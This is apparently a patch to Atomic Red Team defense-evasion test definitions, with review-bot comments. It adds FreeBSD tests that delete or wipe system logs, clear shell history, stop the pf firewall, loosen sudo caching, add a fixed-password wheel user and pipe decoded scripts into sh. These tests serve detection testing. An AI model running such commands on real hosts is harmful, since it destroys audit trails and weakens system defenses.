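Review bot: `Malicious PAM rule (freebsd)` declares `supported_platforms: - linux` while its command and cleanup_command use the BSD form `sed -i ""`, so a Linux runner will select this test and GNU sed will take the empty argument as its script and the real script as a file name; every test suffixed `(freebsd)` in this patch carries the same linux-only platform list, so either add the FreeBSD platform entry the framework accepts or these tests run on the wrong OS. Also worth confirming that FreeBSD sed expands `\n` in the replacement of `"#{index}s,^,#{pam_rule}\n,g"`; POSIX leaves that undefined, and if it is not expanded the rule is spliced onto the existing line instead of inserted above it.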
@@ -921,9 +951,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -945,9 +974,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -969,9 +997,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -993,9 +1020,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -1070,9 +1096,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
owner:
|
||||
description: Username of desired owner
|
||||
@@ -1127,6 +1152,24 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: chflags - Remove immutable file attribute
|
||||
auto_generated_guid: 60eee3ea-2ebd-453b-a666-c52ce08d2709
|
||||
description: |
|
||||
Remove's a file's `immutable` attribute using `chflags`.
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_modify:
|
||||
description: Path of the file
|
||||
type: path
|
||||
default: "/tmp/T1222.002.txt"
|
||||
executor:
|
||||
command: |
|
||||
touch #{file_to_modify}
|
||||
chflags simmutable #{file_to_modify}
|
||||
chflags nosimmutable #{file_to_modify}
|
||||
name: sh
|
||||
- name: Chmod through c script
|
||||
auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab
|
||||
description: 'chmods a file using a c script
|
||||
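Review bot: `chflags - Remove immutable file attribute` lists only `- linux`, but `chflags` with `simmutable`/`nosimmutable` is a BSD interface a Linux host does not have, so the test fails with command not found on the one platform it says it supports; the description's sentence about Rocke compromising Linux web servers also does not describe `chflags`. Set the platform to the BSD the test targets and reword the description as the FreeBSD counterpart of the `chattr` test.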
@@ -1158,6 +1201,36 @@ defense-evasion:
|
||||
executor:
|
||||
command: "#{compiled_file} /tmp/ T1222002\n"
|
||||
name: sh
|
||||
- name: Chmod through c script (freebsd)
|
||||
auto_generated_guid: da40b5fe-3098-4b3b-a410-ff177e49ee2e
|
||||
description: 'chmods a file using a c script
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1222.002/src/T1222.002.c
|
||||
compiled_file:
|
||||
description: Path of compiled file
|
||||
type: path
|
||||
default: "/tmp/T1222002"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
|
||||
|
||||
'
|
||||
prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: "#{compiled_file} /tmp/ T1222002\n"
|
||||
name: sh
|
||||
- name: Chown through c script
|
||||
auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389
|
||||
description: 'chowns a file to root using a c script
|
||||
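Review bot: `Chmod through c script (freebsd)` is a copy of the `Chmod through c script` test above it with only the name and GUID changed: same `- linux` platform, same `source_file` default `PathToAtomicsFolder/T1222.002/src/T1222.002.c`, same `compiled_file` default `/tmp/T1222002` and same executor command. As written it adds nothing and both tests compile to the same path; either drop it or make it differ in what justifies it (the FreeBSD platform entry, and a distinct compiled_file so the two do not clobber each other).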
@@ -1192,6 +1265,37 @@ defense-evasion:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Chown through c script (freebsd)
|
||||
auto_generated_guid: eb577a19-b730-4918-9b03-c5edcf51dc4e
|
||||
description: 'chowns a file to root using a c script
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
source_file:
|
||||
description: Path of c source file
|
||||
type: path
|
||||
default: PathToAtomicsFolder/T1222.002/src/chown.c
|
||||
compiled_file:
|
||||
description: Path of compiled file
|
||||
type: path
|
||||
default: "/tmp/T1222002own"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Compile the script from (#{source_file}). Destination is #{compiled_file}
|
||||
|
||||
'
|
||||
prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{source_file} -o #{compiled_file}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: "#{compiled_file} #{source_file}\n"
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1216.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -2037,6 +2141,27 @@ defense-evasion:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n"
|
||||
- name: Sudo usage (freebsd)
|
||||
auto_generated_guid: 2bf9a018-4664-438a-b435-cc6f8c6f71b1
|
||||
description: 'Common Sudo enumeration methods.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n"
|
||||
- name: Unlimited sudo cache timeout
|
||||
auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
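Review bot: the executor command ends in `sudo ee /usr/local/etc/sudoers`, which opens an interactive editor and blocks an unattended run until someone exits it (the Linux variant's `sudo vim` has the same problem); an enumeration test should not open an editor, and `sudo -l` plus `sudo cat` already cover the stated purpose. The platform list is again `- linux` even though `/usr/local/etc/sudoers` and `pkg install -y sudo` in get_prereq_command are FreeBSD-specific.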
@@ -2053,6 +2178,31 @@ defense-evasion:
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Unlimited sudo cache timeout (freebsd)
|
||||
auto_generated_guid: a83ad6e8-6f24-4d7f-8f44-75f8ab742991
|
||||
description: 'Sets sudo caching timestamp_timeout to a value for unlimited.
|
||||
This is dangerous to modify without using ''visudo'', do not do this on a
|
||||
production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching
|
||||
auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
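Review bot: `sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers` uses the GNU `-i` form; on FreeBSD `-i` takes a mandatory backup-suffix argument, so this invocation consumes the s-command as the suffix and then treats the sudoers path as the script and fails, whereas the PAM test earlier in this patch correctly writes `sed -i ""`. Use `-i ""` here too. Like its Linux counterpart the test has no cleanup_command, so `timestamp_timeout=-1` remains in sudoers after the run; restoring the original line belongs in the test.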
@@ -2068,6 +2218,30 @@ defense-evasion:
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
|
||||
sudo visudo -c -f /etc/sudoers
|
||||
- name: Disable tty_tickets for sudo caching (freebsd)
|
||||
auto_generated_guid: 4df6a0fe-2bdd-4be8-8618-a6a19654a57a
|
||||
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
||||
to modify without using ''visudo'', do not do this on a production system.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit
|
||||
0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y sudo)\n"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
sudo sh -c "echo Defaults "'!'"tty_tickets >> /usr/local/etc/sudoers"
|
||||
sudo visudo -c -f /usr/local/etc/sudoers
|
||||
T1578:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -2602,7 +2776,6 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
@@ -3262,6 +3435,20 @@ defense-evasion:
|
||||
command: |
|
||||
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
|
||||
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
|
||||
- name: Detect Virtualization Environment (FreeBSD)
|
||||
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
|
||||
description: |
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
|
||||
Environment detected"; fi
|
||||
|
||||
'
|
||||
T1070.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
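Review bot: the description says `At boot, dmesg stores a log if a hypervisor is detected`, but the command only checks `sysctl -n hw.hv_vendor` and never reads dmesg; either make the description match the command or add the dmesg check it describes. `elevation_required: true` also looks unnecessary, since reading a sysctl value does not normally need root; verify before keeping it. The platform list is `- linux` for a test built on a FreeBSD sysctl.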
@@ -3347,6 +3534,75 @@ defense-evasion:
|
||||
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: rm -rf
|
||||
auto_generated_guid: bd8ccc45-d632-481e-b7cf-c467627d68f9
|
||||
description: 'Delete messages and security logs
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
rm -rf /var/log/messages
|
||||
rm -rf /var/log/security
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Truncate system log files via truncate utility (freebsd)
|
||||
auto_generated_guid: 14033063-ee04-4eaf-8f5d-ba07ca7a097c
|
||||
description: 'This test truncates the system log files using the truncate utility
|
||||
with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying
|
||||
the file content
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: "truncate -s 0 /var/log/messages #size parameter shorthand\ntruncate
|
||||
--size=0 /var/log/security #size parameter \n"
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
|
||||
auto_generated_guid: 369878c6-fb04-48d6-8fc2-da9d97b3e054
|
||||
description: 'The first sub-test truncates the log file to zero bytes via /dev/null
|
||||
and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero,
|
||||
using cat utility
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
cat /dev/null > /var/log/messages #truncating the file to zero bytes
|
||||
cat /dev/zero > /var/lol/messages #log file filled with null bytes(zeros)
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Overwrite FreeBSD system log via echo utility
|
||||
auto_generated_guid: 11cb8ee1-97fb-4960-8587-69b8388ee9d9
|
||||
description: 'This test overwrites the contents of system log file with an empty
|
||||
string using echo utility
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo '''' > /var/log/messages
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Delete system log files via unlink utility (freebsd)
|
||||
auto_generated_guid: 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
|
||||
description: 'This test deletes the messages log file using unlink utility
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'unlink /var/log/messages
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Delete system journal logs via rm and journalctl utilities
|
||||
auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
|
||||
description: 'The first sub-test deletes the journal files using rm utility
|
||||
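Review bot: `cat /dev/zero > /var/lol/messages` in `Delete log files via cat utility` has a typo in the path (`/var/lol/` for `/var/log/`), so the second sub-test creates a new file instead of touching the log; more importantly, `cat /dev/zero` into a regular file runs until the filesystem is full, which takes down the test host rather than demonstrating log clearing. Bound it (a fixed `count` with `dd`, or `head -c`) or drop the /dev/zero sub-test. The first new test in this hunk is named just `rm -rf`, unlike the others that carry a descriptive name and a `(freebsd)` suffix, and none of the new tests has a cleanup_command, so `/var/log/messages` and `/var/log/security` stay deleted or emptied after the run.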
@@ -4253,6 +4509,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'rm ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (rm)
|
||||
auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
|
||||
description: 'Clears sh history via rm
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'rm ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (echo)
|
||||
@@ -4265,6 +4533,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'echo "" > ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (echo)
|
||||
auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
|
||||
description: 'Clears sh history via echo
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'echo "" > ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (cat dev/null)
|
||||
@@ -4278,6 +4558,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'cat /dev/null > ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (cat dev/null)
|
||||
auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
|
||||
description: 'Clears sh history via cat /dev/null
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /dev/null > ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (ln dev/null)
|
||||
@@ -4291,6 +4583,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'ln -sf /dev/null ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (ln dev/null)
|
||||
auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
|
||||
description: 'Clears sh history via a symlink to /dev/null
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'ln -sf /dev/null ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear Bash history (truncate)
|
||||
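Review bot: no `cleanup_command` follows the `ln -sf /dev/null ~/.sh_history` executor in "Clear sh history (ln dev/null)", so the symlink survives the test and sh history for the account stays disabled until someone notices; add `cleanup_command: rm -f ~/.sh_history` (the Bash sibling in the context above has the same gap).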
@@ -4303,6 +4607,18 @@ defense-evasion:
|
||||
executor:
|
||||
command: 'truncate -s0 ~/.bash_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear sh history (truncate)
|
||||
auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
|
||||
description: 'Clears sh history via truncate
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'truncate -s0 ~/.sh_history
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Clear history of a bunch of shells
|
||||
@@ -4320,6 +4636,22 @@ defense-evasion:
|
||||
export HISTFILESIZE=0
|
||||
history -c
|
||||
name: sh
|
||||
- name: Clear history of a bunch of shells (freebsd)
|
||||
auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
|
||||
description: 'Clears the history of a bunch of different shell types by setting
|
||||
the history size to zero
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
unset HISTFILE
|
||||
unset histfile
|
||||
export HISTFILESIZE=0
|
||||
export HISTSIZE=0
|
||||
history -c
|
||||
name: sh
|
||||
- name: Clear and Disable Bash History Logging
|
||||
auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
|
||||
description: 'Clears the history and disable bash history logging of the current
|
||||
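Review bot: `history -c` on the last line of "Clear history of a bunch of shells (freebsd)" runs under `name: sh`, and FreeBSD's /bin/sh lists `fc` but no `history` builtin in sh(1), so that line ends the test with a command-not-found error after the variables have already been cleared. `export HISTSIZE=0` already discards the in-memory list and `unset HISTFILE` stops the write-out, so either drop the line or guard it with `command -v history >/dev/null 2>&1 && history -c`. `unset histfile` (lower case) targets a csh/tcsh variable that `unset` in sh cannot reach; it is harmless but misleading in a test that only ever runs in sh.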
@@ -4379,6 +4711,33 @@ defense-evasion:
|
||||
'
|
||||
cleanup_command: 'userdel -f testuser1
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Disable sh History Logging with SSH -T (freebsd)
|
||||
auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
|
||||
description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
|
||||
keeps the ssh client from catching a proper TTY, which is what usually gets
|
||||
logged on lastlog
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Install sshpass and create user account used for excuting
|
||||
|
||||
'
|
||||
prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
|
||||
>/dev/null)\n"
|
||||
get_prereq_command: |
|
||||
pw useradd testuser1 -g wheel -s /bin/sh
|
||||
echo 'pwd101!' | pw mod user testuser1 -h 0
|
||||
(which pkg && pkg install -y sshpass)
|
||||
executor:
|
||||
command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
|
||||
|
||||
'
|
||||
cleanup_command: 'rmuser -y testuser1
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1202:
|
||||
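Review bot: the `prereq_command` in "Disable sh History Logging with SSH -T (freebsd)" is `$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)`; each substitution expands to an empty command whose exit status happens to be that of the inner command, which works in POSIX sh but is easy to misread, so write it as `getent passwd testuser1 >/dev/null && command -v sshpass >/dev/null`. The executor `sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname` also fails on a host whose known_hosts lacks the localhost key, because sshpass does not answer the host-key prompt; pre-seed known_hosts in `get_prereq_command` or pass `-o StrictHostKeyChecking=accept-new`. `get_prereq_command` adds testuser1 to `wheel` with a fixed password and only `cleanup_command` removes the account, so a run that fails midway leaves a known-credential wheel member behind; `-g wheel` is not needed for the test and should go. "excuting" in the dependency description is a typo.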
@@ -4562,7 +4921,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
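Review bot: the header `@@ -4562,7 +4921,6 @@` shows seven lines becoming six with nothing added, and the only line inside the context window that can have been removed is `- freebsd` under `supported_platforms`, so this hunk (and the similar 7-to-6 hunks that follow) strips FreeBSD from existing cross-platform tests while the new FreeBSD-specific tests in this same diff are tagged `- linux`. Pick one convention: if `freebsd` is a valid platform value, keep it here and use it on the new tests; if it is not, these removals are right but the new tests need a platform guard in `prereq_command` instead.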
@@ -4600,7 +4958,6 @@ defense-evasion:
|
||||
description: "Use Perl to decode a base64-encoded text string and echo it to
|
||||
the console \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -4661,6 +5018,80 @@ defense-evasion:
|
||||
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
|
||||
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
|
||||
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
|
||||
- name: Base64 decoding with shell utilities (freebsd)
|
||||
auto_generated_guid: b6097712-c42e-4174-b8f2-4b1e1a5bbb3d
|
||||
description: 'Use common shell utilities to decode a base64-encoded text string
|
||||
and echo it to the console
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
message:
|
||||
description: Message to print to the screen
|
||||
type: string
|
||||
default: Hello from Atomic Red Team test T1140!
|
||||
encoded_file:
|
||||
description: File to temporarily save encoded text
|
||||
type: path
|
||||
default: "/tmp/T1140.encoded"
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
ENCODED=$(echo '#{message}' | b64encode -r -)
|
||||
printf $ENCODED | b64decode -r
|
||||
echo $ENCODED | b64decode -r
|
||||
echo $(echo $ENCODED) | b64decode -r
|
||||
echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}
|
||||
echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}
|
||||
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
|
||||
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
|
||||
- name: FreeBSD b64encode Shebang in CLI
|
||||
auto_generated_guid: 18ee2002-66e8-4518-87c5-c0ec9c8299ac
|
||||
description: "Using b64decode shell scripts that have Shebang in them. This
|
||||
is commonly how attackers obfuscate passing and executing a shell script.
|
||||
Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
|
||||
by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
|
||||
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
|
||||
for it. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
bash_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
|
||||
dash_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
|
||||
fish_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
|
||||
sh_encoded:
|
||||
description: Encoded
|
||||
type: string
|
||||
default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
|
||||
dependencies:
|
||||
- description: 'b64decode must be present
|
||||
|
||||
'
|
||||
prereq_command: 'which b64decode
|
||||
|
||||
'
|
||||
get_prereq_command: 'echo "please install b64decode"
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: |
|
||||
echo #{bash_encoded} | b64decode -r | sh
|
||||
echo #{dash_encoded} | b64decode -r | sh
|
||||
echo #{fish_encoded} | b64decode -r | sh
|
||||
echo #{sh_encoded} | b64decode -r | sh
|
||||
- name: Hex decoding with shell utilities
|
||||
auto_generated_guid: '005943f9-8dd5-4349-8b46-0313c0a9f973'
|
||||
description: 'Use common shell utilities to decode a hex-encoded text string
|
||||
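Review bot: in "Base64 decoding with shell utilities (freebsd)" the line `echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}` encodes the file a second time instead of decoding it; every other line of the test calls `b64decode -r`, so this one should read `b64decode -r #{encoded_file}`. In "FreeBSD b64encode Shebang in CLI" the `fish_encoded` default is byte-for-byte the `dash_encoded` value (both decode to a `#!/bin/dash` header), so the fish case is never exercised, and since every variant is piped into `sh` the shebang is never honoured, which is fine for the Sigma rule cited but worth stating in the description. `get_prereq_command: echo "please install b64decode"` can never satisfy the `which b64decode` check; b64decode ships in the FreeBSD base system, so either drop the dependency block or make the message say that.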
@@ -4668,7 +5099,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5579,7 +6009,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5611,7 +6040,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5646,7 +6074,6 @@ defense-evasion:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5673,7 +6100,6 @@ defense-evasion:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -6500,6 +6926,34 @@ defense-evasion:
|
||||
cleanup_command: |
|
||||
ufw enable
|
||||
ufw status verbose
|
||||
- name: Stop/Start Packet Filter
|
||||
auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7
|
||||
description: 'Stop the Packet Filter if installed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pfctl is installed on the machine.
|
||||
|
||||
'
|
||||
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
|
||||
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
|
||||
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
|
||||
get_prereq_command: 'echo ""
|
||||
|
||||
'
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
service pf stop
|
||||
service pf disable
|
||||
cleanup_command: |
|
||||
service pf enable
|
||||
service pf start
|
||||
service pf status
|
||||
- name: Stop/Start UFW firewall systemctl
|
||||
auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1
|
||||
description: "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
|
||||
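Review bot: the `prereq_command` in "Stop/Start Packet Filter" declares PF inactive when `$(kldstat -n pf)` is empty, but `kldstat -n` only lists loaded kld files, so a kernel with `device pf` compiled in (no pf.ko) is reported as inactive and the test is skipped; `kldstat -q -m pf` looks the module up by name, which should also match a statically compiled one, and `pfctl -s info` shows the real enabled state. `service pf disable` / `service pf enable` rely on the rc.subr `enable`/`disable` subcommands that only recent FreeBSD releases ship; the "Disable syslog (freebsd)" test later in this diff uses `sysrc syslogd_enable="NO"`, which works on every release, so `sysrc pf_enable=NO` and `sysrc pf_enable=YES` would be the consistent choice here.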
@@ -6581,6 +7035,33 @@ defense-evasion:
|
||||
cleanup_command: |
|
||||
{ echo y; echo response; } | ufw delete 1
|
||||
ufw status numbered
|
||||
